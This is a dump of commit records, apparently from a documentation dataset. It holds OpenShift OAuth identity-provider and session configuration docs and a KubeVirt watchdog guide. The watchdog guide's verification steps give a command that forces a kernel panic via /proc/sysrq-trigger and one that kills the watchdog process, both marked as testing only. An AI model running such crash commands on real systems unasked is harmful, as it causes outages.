integration.\n\nNote that using GitHub as an identity provider requires users to get a token using `<master>\/oauth\/token\/request` to use with command-line tools.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: github <1>\n challenge: false <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: GitHubIdentityProvider\n clientID: ... <4>\n clientSecret: ... <5>\n----\n<1> This provider name is prefixed to the GitHub numeric user id to form an identity name. 
It is also used to build the callback URL.\n<2> `GitHubIdentityProvider` cannot be used to send WWW-Authenticate challenges.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to GitHub to log in.\n<4> The client id of a link:https:\/\/github.com\/settings\/applications\/new[registered GitHub OAuth application]. The application must be configured with a callback URL of `<master>\/oauth2callback\/<identityProviderName>`\n<5> The client secret issued by GitHub.\n====\n\n==== Google [[Google]]\n\n`GoogleIdentityProvider` uses Google as an identity provider, using Google's OpenID Connect integration.\n\nSee https:\/\/developers.google.com\/identity\/protocols\/OpenIDConnect for more information.\n\nNote that using Google as an identity provider requires users to get a token using `<master>\/oauth\/token\/request` to use with command-line tools.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: google <1>\n challenge: false <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: GoogleIdentityProvider\n clientID: ... <4>\n clientSecret: ... <5>\n----\n<1> This provider name is prefixed to the Google numeric user id to form an identity name. It is also used to build the redirect URL.\n<2> `GoogleIdentityProvider` cannot be used to send WWW-Authenticate challenges.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to Google to log in.\n<4> The client id of a link:https:\/\/console.developers.google.com\/[registered Google project]. The project must be configured with a redirect URI of `<master>\/oauth2callback\/<identityProviderName>`\n<5> The client secret issued by Google.\n====\n\n==== OpenID Connect [[OpenID]]\n\n`OpenIDIdentityProvider` integrates with an OpenID Connect identity provider, using an link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#CodeFlowAuth[Authorization Code Flow].\n\nID Token and UserInfo decryption is not supported.\n\nBy default, the `openid` scope is requested. Extra scopes (if needed) can be specified in the `extraScopes` config field.\n\nClaims are read from the JWT `id_token` returned from the OpenID identity provider (and from the JSON returned by the `UserInfo` URL, if specified).\n\nAt least one claim must be configured as the claim to use as the user's identity. The link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#StandardClaims[standard identity claim] is `sub`.\n\nYou can also indicate which claims to use as the user's preferred username, display name, and email address. If multiple claims are specified, the first one with a non-empty value is used. The link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#StandardClaims[standard claims] are:\n\n* `sub` (used as the user identity)\n* `preferred_username` (used as the preferred user name when provisioning a user)\n* `email` (email address)\n* `name` (display name)\n\nNote that using an OpenID Connect identity provider requires users to get a token using `<master>\/oauth\/token\/request` to use with command-line tools.\n\nStandard config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_openid_connect <1>\n challenge: false <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: OpenIDIdentityProvider\n clientID: ... <4>\n clientSecret: ... 
<5>\n claims:\n id:\n - sub <6>\n preferredUsername:\n - preferred_username\n name:\n - name\n email:\n - email\n urls:\n authorize: https:\/\/myidp.example.com\/oauth2\/authorize <7>\n token: https:\/\/myidp.example.com\/oauth2\/token <8>\n----\n<1> This provider name is prefixed to the value of the identity claim to form an identity name. It is also used to build the redirect URL.\n<2> `OpenIDIdentityProvider` cannot be used to send WWW-Authenticate challenges.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to the authorize URL to log in.\n<4> The client id of a client registered with the OpenID provider. The client must be allowed to redirect to `<master>\/oauth2callback\/<identityProviderName>`\n<5> The client secret.\n<6> Use the value of the `sub` claim in the returned `id_token` as the user's identity.\n<7> link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#AuthorizationEndpoint[Authorization Endpoint] described in the OpenID spec. Must use https.\n<8> link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#TokenEndpoint[Token Endpoint] described in the OpenID spec. Must use https.\n====\n\nA custom certificate bundle, extra scopes, and UserInfo URL can also be specified.\n\nFull config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_openid_connect\n challenge: false\n login: true\n provider:\n apiVersion: v1\n kind: OpenIDIdentityProvider\n clientID: ...\n clientSecret: ...\n ca: my-openid-ca-bundle.crt <1>\n extraScopes: <2>\n - email\n - profile\n claims:\n id: <3>\n - custom_id_claim\n - sub\n preferredUsername: <4>\n - preferred_username\n - email\n name: <5>\n - nickname\n - given_name\n - name\n email: <6>\n - custom_email_claim\n - email\n urls:\n authorize: https:\/\/myidp.example.com\/oauth2\/authorize\n token: https:\/\/myidp.example.com\/oauth2\/token\n userInfo: https:\/\/myidp.example.com\/oauth2\/userinfo <7>\n----\n<1> Certificate bundle to use to validate server certificates for the configured URLs. If empty, system trusted roots are used.\n<2> List of scopes to request (in addition to the `openid` scope) during the authorization request.\n<3> List of claims to use as the identity. First non-empty claim is used. At least one claim is required. If none of the listed claims have a value, authentication will fail.\n<4> List of claims to use as the preferred username when provisioning a user for this identity. First non-empty claim is used.\n<5> List of claims to use as the display name. First non-empty claim is used.\n<6> List of claims to use as the email address. First non-empty claim is used.\n<7> link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#UserInfo[UserInfo Endpoint] described in the OpenID spec. Must use https.\n====\n\n=== Token options\n\nThe OAuth server generates two kinds of tokens. \n\nAuthorize codes are short-lived tokens whose only use is to be exchanged for an access token. Set `authorizeTokenMaxAgeSeconds` to control the lifetime of authorize codes. The default lifetime is 5 minutes.\n\nAccess tokens are longer-lived tokens that grant access to the API. Set `accessTokenMaxAgeSeconds` to control the lifetime of access tokens. 
The default lifetime is 24 hours.\n\nMaster config:\n----\noauthConfig:\n ...\n tokenConfig:\n accessTokenMaxAgeSeconds: 86400\n authorizeTokenMaxAgeSeconds: 300\n----\n\n=== Grant options\n\nTo configure how the OAuth server responds to token requests for a client the user has not previously granted permission, set the `method` value in the `grantConfig` stanza. Valid values are:\n\n* `auto`\n** Auto-approve the grant and retry the request\n* `prompt`\n** Prompt the user to approve or deny the grant\n* `deny`\n** Auto-deny the grant and return a failure error to the client\n\nMaster config:\n----\noauthConfig:\n ...\n grantConfig:\n method: auto\n----\n\n=== Session options\n\nThe OAuth server uses a signed and encrypted cookie-based session during login and redirect flows.\n\nIf no `sessionSecretsFile` is specified, a random signing and encryption secret is generated at each start of the master server. This means that any logins in progress will have their sessions invalidated if the master is restarted. It also means that if multiple masters are configured, they will not be able to decode sessions generated by one of the other masters.\n\nTo specify the signing and encryption secret to use, specify a `sessionSecretsFile`. This allows you to separate secret values from the config file, and keep the config file distributable for debugging, etc.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n sessionConfig:\n sessionMaxAgeSeconds: 300 <1>\n sessionName: ssn <2>\n sessionSecretsFile: \"...\" <3>\n----\n<1> Controls the maximum age of a session (sessions auto-expire once a token request is complete). If auto-grant is not enabled, sessions must last as long as the user is expected to take to approve or reject a client authorization request.\n<2> Name of the cookie used to store the session.\n<3> Filename containing serialized SessionSecrets object. If empty, a random signing and encryption secret is generated at each server start.\n====\n\nMultiple secrets can be specified in the `sessionSecretsFile` to enable rotation. New sessions are signed and encrypted using the first secret in the list. Existing sessions are decrypted\/authenticated by each secret until one succeeds.\n\nSession secret config:\n====\n----\napiVersion: v1\nkind: SessionSecrets\nsecrets: <1>\n- authentication: \"...\" <2>\n encryption: \"...\" <3>\n- authentication: \"...\"\n encryption: \"...\"\n...\n----\n<1> List of secrets used to authenticate and encrypt cookie sessions. At least one secret must be specified. Each secret must set an authentication and encryption secret.\n<2> Signing secret, used to authenticate sessions using HMAC. Recommended to use a secret with 32 or 64 bytes.\n<3> Encrypting secret, used to encrypt sessions. Must be 16, 24, or 32 characters long, to select AES-128, AES-192, or AES-256.\n====","old_contents":"= Authentication\n{product-author}\n{product-version}\n:data-uri:\n:icons:\n:experimental:\n:toc: macro\n:toc-title: \n\ntoc::[]\n\n== Overview\n\nThe authentication layer is responsible for identifying the user associated with requests to the OpenShift API.
Information about the requesting user is then used by the authorization layer to determine whether the request should be allowed.\n\n== API Authentication\n\nRequests to the OpenShift API are authenticated using the following methods:\n\n* OAuth Access Tokens\n** Obtained from the OpenShift OAuth server using the `<master>\/oauth\/authorize` and `<master>\/oauth\/token` endpoints\n** Sent as an \"Authorization: Bearer …\" header or an \"access_token=…\" query parameter\n* X.509 Client Certificates\n** Requires a https connection to the API server\n** Verified by the API server against a trusted certificate authority bundle\n** The API server creates and distributes certificates to controllers to authenticate themselves\n\nAny request with an invalid access token or an invalid certificate is rejected by the authentication layer with a 401 error.\n\nIf no access token or certificate is presented, the authentication layer assigns the `system:anonymous` user and the `system:unauthenticated` group to the request. This allows the authorization layer to determine which requests (if any) an anonymous user is allowed to make.\n\n== OAuth overview\n\nThe OpenShift master includes a built-in OAuth server. End-users obtain OAuth access tokens to authenticate themselves to the API.\n\nWhen a person requests a new OAuth token, the OAuth server uses the configured identity provider(s) to determine the identity of the person making the request.\n\nIt then determines what user that identity maps to, creates an access token for that user, and returns the token for use.\n\n=== OAuth clients\n\nEvery request for an OAuth token must specify the OAuth client which will receive and use the token. The following OAuth clients are automatically created when starting the OpenShift API:\n\n * `openshift-web-console`: used to request tokens for the web console\n * `openshift-browser-client`: used to request tokens at `<master>\/oauth\/token\/request` with a user-agent that can handle interactive logins\n * `openshift-challenging-client`: used to request tokens with a user-agent that can handle `WWW-Authenticate` challenges\n\nTo register additional clients:\n====\n----\nosc create -f <(echo '\n{\n \"kind\": \"OAuthClient\",\n \"version\": \"v1beta1\",\n \"metadata\": {\n \"name\":\"demo\" <1>\n },\n \"secret\": \"...\", <2>\n \"redirectURIs\": [\n \"http:\/\/www.example.com\/\" <3>\n ]\n}')\n----\n<1> The `name` of the OAuth client is used as the `client_id` parameter when making requests to `<master>\/oauth\/authorize` and `<master>\/oauth\/token`.\n<2> The `secret` is used as the `client_secret` parameter when making requests to `<master>\/oauth\/token`.\n<3> The `redirect_uri` parameter specified in requests to `<master>\/oauth\/authorize` and `<master>\/oauth\/token` must be equal to (or prefixed by) one of the URIs in `redirectURIs`.\n====\n\n=== Integrations\n\nAll requests for OAuth tokens involve a request to `<master>\/oauth\/authorize`. 
Most authentication integrations will place an authenticating proxy in front of this endpoint, or configure OpenShift to validate credentials against a backing identity provider.\n\nBecause requests to `<master>\/oauth\/authorize` can come from user-agents that cannot display interactive login pages (like `osc`), authenticating using a `WWW-Authenticate` challenge is supported in addition to interactive login flows.\n\nIf an authenticating proxy is placed in front of the `<master>\/oauth\/authorize` endpoint, it should send unauthenticated non-browser user-agents `WWW-Authenticate` challenges, rather than displaying an interactive login page or redirecting to an interactive login flow.\n\nIf the authenticating proxy cannot support `WWW-Authenticate` challenges (or if OpenShift is configured to use an identity provider that does not support WWW-Authenticate challenges), users can visit `<master>\/oauth\/token\/request` using a browser to obtain an access token manually.\n\n== OAuth configuration\n\nOAuth configuration is specified in the master config file.\n\nWhen running without a master config file, the `AllowAllPasswordIdentityProvider` identity provider is used, which allows any non-empty username and password to log in. This is useful for test purposes.\n\nTo use other identity providers, you must run from a config file. For more information about creating and running from config files, see link:..\/using_openshift\/master_node_configuration.html[Master and Node Configuration].\n\n=== Identity providers\n\n==== Allow All [[AllowAllPasswordIdentityProvider]]\n\n`AllowAllPasswordIdentityProvider` allows any non-empty login and password. This is the default identity provider when running OpenShift without a config file.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_allow_provider <1>\n challenge: true <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: AllowAllPasswordIdentityProvider\n----\n<1> This provider name is prefixed to logins to form an identity name.\n<2> When `true`, unauthenticated token requests from non-web clients (like `osc`) will be sent a WWW-Authenticate challenge header for this provider.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to a login page backed by this provider.\n====\n\n==== Deny All [[DenyAllPasswordIdentityProvider]]\n\n`DenyAllPasswordIdentityProvider` denies all username and passwords.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_deny_provider <1>\n challenge: true <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: DenyAllPasswordIdentityProvider\n----\n<1> This provider name is prefixed to logins to form an identity name.\n<2> When `true`, unauthenticated token requests from non-web clients (like `osc`) will be sent a WWW-Authenticate challenge header for this provider.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to a login page backed by this provider.\n====\n\n==== HTPasswd [[HTPasswdPasswordIdentityProvider]]\n\n`HTPasswdPasswordIdentityProvider` validates logins and passwords against a flat-file generated using http:\/\/httpd.apache.org\/docs\/2.4\/programs\/htpasswd.html[htpasswd]\n\n* Only MD5 and SHA encryption types are supported. MD5 encryption is recommended, and is the default for htpasswd. 
Plaintext, crypt, and bcrypt hashes are not currently supported.\n* The file is re-read if its modification time changes, without requiring a server restart\n* To create the file: `htpasswd -c <\/path\/to\/users.htpasswd> <login>`\n* To add or update a login to the file: `htpasswd <\/path\/to\/users.htpasswd> <login>`\n* To remove a login from the file: `htpasswd <\/path\/to\/users.htpasswd> -D <login>`\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_htpasswd_provider <1>\n challenge: true <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: HTPasswdPasswordIdentityProvider\n file: \/path\/to\/users.htpasswd <4>\n----\n<1> This provider name is prefixed to logins to form an identity name.\n<2> When `true`, unauthenticated token requests from non-web clients (like `osc`) will be sent a WWW-Authenticate challenge header for this provider.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to a login page backed by this provider.\n<4> File generated using http:\/\/httpd.apache.org\/docs\/2.4\/programs\/htpasswd.html[htpasswd].\n====\n\n==== Basic-Auth (remote) [[BasicAuthPasswordIdentityProvider]]\n\n`BasicAuthPasswordIdentityProvider` validates logins and passwords against a remote server using a server-to-server basic-auth request.\n\n* Logins and passwords are validated against a basic-auth protected, JSON-returning remote URL\n* A 401 response indicates failed auth.\n* A non-200 status, or the presence of a non-empty \"error\" key, indicates an error: `{\"error\":\"Error message\"}`\n* A 200 status with an \"id\" key indicates success: `{\"id\":\"userid\"}`\n** The id must be unique to the authenticated user\n** The id must not be able to be modified\n* A successful response may optionally provide additional data:\n** Display name. Example: `{\"id\":\"userid\", \"name\": \"User Name\", ...}`\n** Email address. Example: `{\"id\":\"userid\", \"email\":\"user@example.com\", ...}`\n** Preferred login. This is useful when the unique, unchangeable user id is a database key or UID, and a more human-readable name exists. This is used as a hint when provisioning the OpenShift user for the authenticated identity. Example: `{\"id\":\"014fbff9a07c\", \"login\":\"bob\", ...}`\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_remote_basic_auth_provider <1>\n challenge: true <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: BasicAuthPasswordIdentityProvider\n url: https:\/\/www.example.com\/remote-idp <4>\n ca: \/path\/to\/ca.file <5>\n certFile: \/path\/to\/client.crt <6>\n keyFile: \/path\/to\/client.key <7>\n----\n<1> This provider name is prefixed to the returned user id to form an identity name.\n<2> When `true`, unauthenticated token requests from non-web clients (like `osc`) will be sent a WWW-Authenticate challenge header for this provider.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to a login page backed by this provider.\n<4> URL accepting credentials in basic-auth headers.\n<5> Certificate bundle to use to validate server certificates for the configured URL. Optional.\n<6> Client certificate to present when making requests to the configured URL. Optional.\n<7> Key for the client certificate. Required if `certFile` is specified.\n====\n\n==== Request Header [[RequestHeaderIdentityProvider]]\n\n`RequestHeaderIdentityProvider` identifies users from request header values, like `X-Remote-User`. 
It is typically used in combination with an authenticating proxy, which sets the request header value.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_request_header_provider <1>\n challenge: false <2>\n login: false <3>\n provider:\n apiVersion: v1\n kind: RequestHeaderIdentityProvider\n clientCA: \/path\/to\/client-ca.file <4>\n headers: <5>\n - X-Remote-User\n - SSO-User\n----\n<1> This provider name is prefixed to the user id in the request header to form an identity name.\n<2> `RequestHeaderIdentityProvider` cannot be used to send WWW-Authenticate challenges.\n<3> `RequestHeaderIdentityProvider` cannot be used to back a login page.\n<4> PEM-encoded certificate bundle. If set, a valid client certificate must be presented and validated against the certificate authorities in the specified file before the request headers are checked for usernames. Optional.\n<5> Header names to check, in order, for user ids. The first header containing a value is used as the user id. Required, case-insensitive.\n====\n\n==== GitHub [[GitHub]]\n\n`GitHubIdentityProvider` uses GitHub as an identity provider, using the OAuth integration.\n\nNote that using GitHub as an identity provider requires users to get a token using `<master>\/oauth\/token\/request` to use with command-line tools.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: github <1>\n challenge: false <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: GitHubIdentityProvider\n clientID: ... <4>\n clientSecret: ... <5>\n----\n<1> This provider name is prefixed to the GitHub numeric user id to form an identity name. It is also used to build the callback URL.\n<2> `GitHubIdentityProvider` cannot be used to send WWW-Authenticate challenges.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to GitHub to log in.\n<4> The client id of a link:https:\/\/github.com\/settings\/applications\/new[registered GitHub OAuth application]. The application must be configured with a callback URL of `<master>\/oauth2callback\/<identityProviderName>`\n<5> The client secret issued by GitHub.\n====\n\n==== Google [[Google]]\n\n`GoogleIdentityProvider` uses Google as an identity provider, using Google's OpenID Connect integration.\n\nSee https:\/\/developers.google.com\/identity\/protocols\/OpenIDConnect for more information.\n\nNote that using Google as an identity provider requires users to get a token using `<master>\/oauth\/token\/request` to use with command-line tools.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: google <1>\n challenge: false <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: GoogleIdentityProvider\n clientID: ... <4>\n clientSecret: ... <5>\n----\n<1> This provider name is prefixed to the Google numeric user id to form an identity name. It is also used to build the redirect URL.\n<2> `GoogleIdentityProvider` cannot be used to send WWW-Authenticate challenges.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to Google to log in.\n<4> The client id of a link:https:\/\/console.developers.google.com\/[registered Google project]. 
The project must be configured with a redirect URI of `<master>\/oauth2callback\/<identityProviderName>`\n<5> The client secret issued by Google.\n====\n\n==== OpenID Connect [[OpenID]]\n\n`OpenIDIdentityProvider` integrates with an OpenID Connect identity provider, using an link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#CodeFlowAuth[Authorization Code Flow].\n\nID Token and UserInfo decryption is not supported.\n\nBy default, the `openid` scope is requested. Extra scopes (if needed) can be specified in the `extraScopes` config field.\n\nClaims are read from the JWT `id_token` returned from the OpenID identity provider (and from the JSON returned by the `UserInfo` URL, if specified).\n\nAt least one claim must be configured as the claim to use as the user's identity. The link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#StandardClaims[standard identity claim] is `sub`.\n\nYou can also indicate which claims to use as the user's preferred username, display name, and email address. If multiple claims are specified, the first one with a non-empty value is used. The link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#StandardClaims[standard claims] are:\n\n* `sub` (used as the user identity)\n* `preferred_username` (used as the preferred user name when provisioning a user)\n* `email` (email address)\n* `name` (display name)\n\nNote that using an OpenID Connect identity provider requires users to get a token using `<master>\/oauth\/token\/request` to use with command-line tools.\n\nStandard config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_openid_connect <1>\n challenge: false <2>\n login: true <3>\n provider:\n apiVersion: v1\n kind: OpenIDIdentityProvider\n clientID: ... <4>\n clientSecret: ... <5>\n claims:\n id:\n - sub <6>\n preferredUsername:\n - preferred_username\n name:\n - name\n email:\n - email\n urls:\n authorize: https:\/\/myidp.example.com\/oauth2\/authorize <7>\n token: https:\/\/myidp.example.com\/oauth2\/token <8>\n----\n<1> This provider name is prefixed to the value of the identity claim to form an identity name. It is also used to build the redirect URL.\n<2> `OpenIDIdentityProvider` cannot be used to send WWW-Authenticate challenges.\n<3> When `true`, unauthenticated token requests from web clients (like the web console) will be redirected to the authorize URL to log in.\n<4> The client id of a client registered with the OpenID provider. The client must be allowed to redirect to `<master>\/oauth2callback\/<identityProviderName>`\n<5> The client secret.\n<6> Use the value of the `sub` claim in the returned `id_token` as the user's identity.\n<7> link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#AuthorizationEndpoint[Authorization Endpoint] described in the OpenID spec. Must use https.\n<8> link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#TokenEndpoint[Token Endpoint] described in the OpenID spec. 
Must use https.\n====\n\nA custom certificate bundle, extra scopes, and UserInfo URL can also be specified.\n\nFull config:\n====\n----\noauthConfig:\n ...\n identityProviders:\n - name: my_openid_connect\n challenge: false\n login: true\n provider:\n apiVersion: v1\n kind: OpenIDIdentityProvider\n clientID: ...\n clientSecret: ...\n ca: my-openid-ca-bundle.crt <1>\n extraScopes: <2>\n - email\n - profile\n claims:\n id: <3>\n - custom_id_claim\n - sub\n preferredUsername: <4>\n - preferred_username\n - email\n name: <5>\n - nickname\n - given_name\n - name\n email: <6>\n - custom_email_claim\n - email\n urls:\n authorize: https:\/\/myidp.example.com\/oauth2\/authorize\n token: https:\/\/myidp.example.com\/oauth2\/token\n userInfo: https:\/\/myidp.example.com\/oauth2\/userinfo <7>\n----\n<1> Certificate bundle to use to validate server certificates for the configured URLs. If empty, system trusted roots are used.\n<2> List of scopes to request (in addition to the `openid` scope) during the authorization request.\n<3> List of claims to use as the identity. First non-empty claim is used. At least one claim is required. If none of the listed claims have a value, authentication will fail.\n<4> List of claims to use as the preferred username when provisioning a user for this identity. First non-empty claim is used.\n<5> List of claims to use as the display name. First non-empty claim is used.\n<6> List of claims to use as the email address. First non-empty claim is used.\n<7> link:http:\/\/openid.net\/specs\/openid-connect-core-1_0.html#UserInfo[UserInfo Endpoint] described in the OpenID spec. Must use https.\n====\n\n=== Token options\n\nThe OAuth server generates two kinds of tokens. \n\nAuthorize codes are short-lived tokens whose only use is to be exchanged for an access token. Set `authorizeTokenMaxAgeSeconds` to control the lifetime of authorize codes. The default lifetime is 5 minutes.\n\nAccess tokens are longer-lived tokens that grant access to the API. Set `accessTokenMaxAgeSeconds` to control the lifetime of access tokens. The default lifetime is 1 hour.\n\nMaster config:\n----\noauthConfig:\n ...\n tokenConfig:\n accessTokenMaxAgeSeconds: 3600\n authorizeTokenMaxAgeSeconds: 300\n----\n\n=== Grant options\n\nTo configure how the OAuth server responds to token requests for a client the user has not previously granted permission, set the `method` value in the `grantConfig` stanza. Valid values are:\n\n* `auto`\n** Auto-approve the grant and retry the request\n* `prompt`\n** Prompt the user to approve or deny the grant\n* `deny`\n** Auto-deny the grant and return a failure error to the client\n\nMaster config:\n----\noauthConfig:\n ...\n grantConfig:\n method: auto\n----\n\n=== Session options\n\nThe OAuth server uses a signed and encrypted cookie-based session during login and redirect flows.\n\nIf no `sessionSecretsFile` is specified, a random signing and encryption secret is generated at each start of the master server. This means that any logins in progress will have their sessions invalidated if the master is restarted. It also means that if multiple masters are configured, they will not be able to decode sessions generated by one of the other masters.\n\nTo specify the signing and encryption secret to use, specify a `sessionSecretsFile`. 
This allows you to separate secret values from the config file, and keep the config file distributable for debugging, etc.\n\nMaster config:\n====\n----\noauthConfig:\n ...\n sessionConfig:\n sessionMaxAgeSeconds: 300 <1>\n sessionName: ssn <2>\n sessionSecretsFile: \"...\" <3>\n----\n<1> Controls the maximum age of a session (sessions auto-expire once a token request is complete). If auto-grant is not enabled, sessions must last as long as the user is expected to take to approve or reject a client authorization request.\n<2> Name of the cookie used to store the session.\n<3> Filename containing serialized SessionSecrets object. If empty, a random signing and encryption secret is generated at each server start.\n====\n\nMultiple secrets can be specified in the `sessionSecretsFile` to enable rotation. New sessions are signed and encrypted using the first secret in the list. Existing sessions are decrypted\/authenticated by each secret until one succeeds.\n\nSession secret config:\n====\n----\napiVersion: v1\nkind: SessionSecrets\nsecrets: <1>\n- authentication: \"...\" <2>\n encryption: \"...\" <3>\n- authentication: \"...\"\n encryption: \"...\"\n...\n----\n<1> List of secrets used to authenticate and encrypt cookie sessions. At least one secret must be specified. Each secret must set an authentication and encryption secret.\n<2> Signing secret, used to authenticate sessions using HMAC. Recommended to use a secret with 32 or 64 bytes.\n<3> Encrypting secret, used to encrypt sessions. Must be 16, 24, or 32 characters long, to select AES-128, AES-192, or AES-256.\n====","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b00999deed40d22b78472a28b41a17808d98afdf","subject":"Docs ServerRSocketFactoryCustomizer->ServerRSocketFactoryProcessor","message":"Docs ServerRSocketFactoryCustomizer->ServerRSocketFactoryProcessor\n\nThe documentation incorrectly used ServerRSocketFactoryCustomizer which\nwas renamed to ServerRSocketFactoryProcessor. The docs now use the correct\nclass name\n\nFixes gh-7737\n","repos":"spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security","old_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/reactive\/rsocket.adoc","new_file":"docs\/manual\/src\/docs\/asciidoc\/_includes\/reactive\/rsocket.adoc","new_contents":"","old_contents":"","returncode":0,"stderr":"unknown","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"91a56b1f5961fab17d58ba45d131235223903a05","subject":"code updates","message":"code updates\n","repos":"vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs,vikram-redhat\/openshift-docs","old_file":"modules\/virt-defining-a-watchdog.adoc","new_file":"modules\/virt-defining-a-watchdog.adoc","new_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * virt\/virtual_machines\/advanced_vm_management\/virt-configuring-a-watchdog.adoc\n\n[id=\"virt-defining-a-watchdog\"]\n= Defining a watchdog device\n\nDefine how the watchdog proceeds when the operating system (OS) no longer responds.\n\n.Available actions\n[horizontal]\n`poweroff`:: The virtual machine (VM) powers down immediately.\n`reset`:: The VM reboots in place and the guest OS cannot react.
Because the length of time required for the guest OS to reboot can cause liveness probes to time out, use of this option is discouraged. This timeout can extend the time it takes the VM to reboot if cluster-level protections notice the liveness probe failed and forcibly reschedule it.\n`shutdown`:: The VM gracefully powers down by stopping all services.\n\n\n.Procedure\n\n. Create a YAML file with the following contents:\n\n+\n[source,yaml]\n----\napiVersion: kubevirt.io\/v1\nkind: VirtualMachine\nmetadata:\n labels:\n kubevirt.io\/vm: vm2-rhel84-watchdog\n name: <vm-name>\nspec:\n running: false\n template:\n metadata:\n labels:\n kubevirt.io\/vm: vm2-rhel84-watchdog\n spec:\n domain:\n devices:\n watchdog:\n name: <watchdog>\n i6300esb:\n action: \"poweroff\" <1>\n...\n----\n<1> Specify the `watchdog` action (`poweroff`, `reset`, or `shutdown`).\n\n+\nThe example above configures the `i6300esb` watchdog device on a RHEL8 VM with the poweroff action and exposes the device as `\/dev\/watchdog`.\n+\nThis device can now be used by the watchdog binary.\n\n. Apply the YAML file to your cluster by running the following command:\n\n+\n[source,yaml]\n----\n$ oc apply -f <file_name>.yaml\n----\n\n.Verification\n\n--\n[IMPORTANT]\n====\nThis procedure is provided for testing watchdog functionality only and must not be run on production machines.\n====\n--\n\n. Run the following command to verify that the VM is connected to the watchdog device:\n\n+\n[source,terminal]\n----\n$ lspci | grep watchdog -i\n----\n\n. Run one of the following commands to confirm the watchdog is active:\n\n\n* Trigger a kernel panic:\n+\n[source,terminal]\n----\n# echo c > \/proc\/sysrq-trigger\n----\n\n* Terminate the watchdog service:\n+\n[source,terminal]\n----\n# pkill -9 watchdog\n----\n","old_contents":"\/\/ Module included in the following assemblies:\n\/\/\n\/\/ * virt\/virtual_machines\/advanced_vm_management\/virt-configuring-a-watchdog.adoc\n\n[id=\"virt-defining-a-watchdog\"]\n= Defining a watchdog device\n\nDefine how the watchdog proceeds when the operating system (OS) no longer responds.\n\n.Available actions\n[horizontal]\n`poweroff`:: The virtual machine (VM) powers down immediately.\n`reset`:: The VM reboots in place and the guest OS cannot react. Because the length of time required for the guest OS to reboot can cause liveness probes to time out, use of this option is discouraged. This timeout can extend the time it takes the VM to reboot if cluster-level protections notice the liveness probe failed and forcibly reschedule it.\n`shutdown`:: The VM gracefully powers down by stopping all services.\n\n\n.Procedure\n\n. Create a YAML file with the following contents:\n\n+\n[source,yaml]\n----\napiVersion: kubevirt.io\/v1\nkind: VirtualMachine\nmetadata:\n labels:\n kubevirt.io\/vm: vm2-rhel84-watchdog\n name: <vm-name>\nspec:\n running: false\n template:\n metadata:\n labels:\n kubevirt.io\/vm: vm2-rhel84-watchdog\n spec:\n domain:\n devices:\n watchdog:\n name: <watchdog>\n i6300esb:\n action: \"poweroff\" <1>\n...\n----\n<1> Specify the `watchdog` action (`poweroff`, `reset`, or `shutdown`).\n\n+\nThe example above configures the `i6300esb` watchdog device on a RHEL8 VM with the poweroff action and exposes the device as `\/dev\/watchdog`.\n+\nThis device can now be used by the watchdog binary.\n\n.
